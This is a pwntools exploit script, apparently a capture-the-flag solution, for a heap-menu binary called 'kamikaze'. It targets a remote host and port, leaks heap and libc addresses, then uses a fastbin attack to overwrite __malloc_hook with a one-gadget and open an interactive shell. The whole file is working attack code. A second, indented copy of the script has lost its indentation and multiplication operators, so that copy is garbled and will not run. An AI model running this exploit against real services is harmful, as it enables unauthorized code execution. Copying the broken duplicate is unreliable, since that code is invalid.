hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('')
elf = ELF('./kamikaze')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "185.168.131.14"
RPORT = 6200
LHOST = "127.0.0.1"
LPORT = 6200

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./kamikaze'], gdbscript=gdbscript)
else:
    conn = process(['./kamikaze'])
    # conn = process(['./kamikaze'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

def create(w, s, stanza, hook):
    conn.sendlineafter('>> ', '1')
    conn.sendafter('he song:', str(w).ljust(0xd, '\x00'))
    conn.sendafter('of the stanza:', str(s).ljust(0x4, '\x00'))
    conn.sendafter('Enter the stanza:', stanza)
    conn.sendafter('Leave a short hook for it too: ', hook)

def edit(weight, stanza):
    conn.sendlineafter('>> ', '2')
    conn.sendafter('weight:', str(weight).ljust(0x14, '\x00'))
    conn.sendafter('stanza:', stanza)

def kamikaze(weight, seed):
    conn.sendlineafter('>> ', '3')
    conn.sendafter('weight:', str(weight).ljust(4, '\x00'))
    conn.sendafter('Enter seed:', str(seed).ljust(4, '\x00'))

def delete(weight):
    conn.sendlineafter('>> ', '4')
    conn.sendafter('weight:', str(weight).ljust(0x14, '\x00'))

def play(idx):
    conn.sendlineafter('>> ', '5')
    conn.sendlineafter('Enter song index:', str(idx))

    # exploit
log.info('Pwning')

create(0xf, 0x28,  '0'*0x1f+'\n', '0'*0x10)

# leak heap address
create(10, 0x28, 'x'*0x1f+'\n', '1'*0x10)
create(20, 0x28, 'x'*0x1f+'\n', '2'*0x10)
delete(10)
create(30, 0x68, 'x'*0x1f+'\n', '3'*0x10)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(20)
kamikaze(40, 0x2)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(30)
play(6)
conn.recvuntil('Weight: ')
heap_base = int(conn.recvline()[:-1], 16) - 0xf0
dbg('heap_base')

# leak libc address
delete(40)
payload = p64(0x100) + p64(heap_base+0xc8) + p64(0) + 'x'*0xe +'\n'
create(100, 0x28, payload, 'z'*0x10)
edit(0x100, '\xd1')
delete(40)
create(60, 0x68, 'x'*0x1f+'\n', '2'*0x10)
create(60, 0x68, 'x'*0x1f+'\n', '2'*0x10)
play(3)
conn.recvuntil('Weight: ')
libc_base = int(conn.recvline()[:-1], 16) - 0x3c4b78
dbg('libc_base')

create(60, 0x68, p64(libc_base+0x3c4b78)*2+'\n', '2'*0x10)

delete(60)
edit(0, '\x00'*6)
create(60, 0x68, p64(libc_base+0x3c4b78)*2+'\n', '2'*0x10)

delete(0xf)
create(0xe, 0x28,  '0'*0x1f+'\n', '0'*0x10)
create(0xf, 0x28,  '0'*0x1f+'\n', '0'*0x10)

create(10, 0x28, 'x'*0x1f+'\n', '1'*0x10)
create(20, 0x28, 'x'*0x1f+'\n', '2'*0x10)
delete(10)
create(30, 0x68, 'x'*0x1f+'\n', '3'*0x10)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(20)
kamikaze(40, 0x2)
create(40, 0x68, 'x'*0x1f+'\n', '4'*0x10)
delete(30)
delete(40)
payload = p64(0x100) + p64(heap_base+0x3b0) + p64(0) + 'x'*0xe +'\n'
create(100, 0x28, payload, 'z'*0x10)

# fastbin attack & write to __malloc_hook
edit(0x100, p64(libc_base+0x3c4aed)[:6])
create(100, 0x68, payload, 'z'*0x10)
payload = '\x00'* 3 + p64(0)*2 + p64(libc_base+0xf02a4)+'\n'
create(100, 0x68, payload, 'z'*0x10)

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window

	# libc = ELF('')
	elf = ELF('./kamikaze')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "185.168.131.14"
	RPORT = 6200
	LHOST = "127.0.0.1"
	LPORT = 6200

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./kamikaze'], gdbscript=gdbscript)
	else:
	conn = process(['./kamikaze'])
	# conn = process(['./kamikaze'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	def create(w, s, stanza, hook):
	conn.sendlineafter('>> ', '1')
	conn.sendafter('he song:', str(w).ljust(0xd, '\x00'))
	conn.sendafter('of the stanza:', str(s).ljust(0x4, '\x00'))
	conn.sendafter('Enter the stanza:', stanza)
	conn.sendafter('Leave a short hook for it too: ', hook)

	def edit(weight, stanza):
	conn.sendlineafter('>> ', '2')
	conn.sendafter('weight:', str(weight).ljust(0x14, '\x00'))
	conn.sendafter('stanza:', stanza)

	def kamikaze(weight, seed):
	conn.sendlineafter('>> ', '3')
	conn.sendafter('weight:', str(weight).ljust(4, '\x00'))
	conn.sendafter('Enter seed:', str(seed).ljust(4, '\x00'))

	def delete(weight):
	conn.sendlineafter('>> ', '4')
	conn.sendafter('weight:', str(weight).ljust(0x14, '\x00'))

	def play(idx):
	conn.sendlineafter('>> ', '5')
	conn.sendlineafter('Enter song index:', str(idx))

	# exploit
	log.info('Pwning')

	create(0xf, 0x28, '0'0x1f+'\n', '0'0x10)

	# leak heap address
	create(10, 0x28, 'x'0x1f+'\n', '1'0x10)
	create(20, 0x28, 'x'0x1f+'\n', '2'0x10)
	delete(10)
	create(30, 0x68, 'x'0x1f+'\n', '3'0x10)
	create(40, 0x68, 'x'0x1f+'\n', '4'0x10)
	delete(20)
	kamikaze(40, 0x2)
	create(40, 0x68, 'x'0x1f+'\n', '4'0x10)
	delete(30)
	play(6)
	conn.recvuntil('Weight: ')
	heap_base = int(conn.recvline()[:-1], 16) - 0xf0
	dbg('heap_base')

	# leak libc address
	delete(40)
	payload = p64(0x100) + p64(heap_base+0xc8) + p64(0) + 'x'*0xe +'\n'
	create(100, 0x28, payload, 'z'*0x10)
	edit(0x100, '\xd1')
	delete(40)
	create(60, 0x68, 'x'0x1f+'\n', '2'0x10)
	create(60, 0x68, 'x'0x1f+'\n', '2'0x10)
	play(3)
	conn.recvuntil('Weight: ')
	libc_base = int(conn.recvline()[:-1], 16) - 0x3c4b78
	dbg('libc_base')

	create(60, 0x68, p64(libc_base+0x3c4b78)2+'\n', '2'0x10)

	delete(60)
	edit(0, '\x00'*6)
	create(60, 0x68, p64(libc_base+0x3c4b78)2+'\n', '2'0x10)

	delete(0xf)
	create(0xe, 0x28, '0'0x1f+'\n', '0'0x10)
	create(0xf, 0x28, '0'0x1f+'\n', '0'0x10)

	create(10, 0x28, 'x'0x1f+'\n', '1'0x10)
	create(20, 0x28, 'x'0x1f+'\n', '2'0x10)
	delete(10)
	create(30, 0x68, 'x'0x1f+'\n', '3'0x10)
	create(40, 0x68, 'x'0x1f+'\n', '4'0x10)
	delete(20)
	kamikaze(40, 0x2)
	create(40, 0x68, 'x'0x1f+'\n', '4'0x10)
	delete(30)
	delete(40)
	payload = p64(0x100) + p64(heap_base+0x3b0) + p64(0) + 'x'*0xe +'\n'
	create(100, 0x28, payload, 'z'*0x10)

	# fastbin attack & write to __malloc_hook
	edit(0x100, p64(libc_base+0x3c4aed)[:6])
	create(100, 0x68, payload, 'z'*0x10)
	payload = '\x00'* 3 + p64(0)*2 + p64(libc_base+0xf02a4)+'\n'
	create(100, 0x68, payload, 'z'*0x10)

	conn.interactive()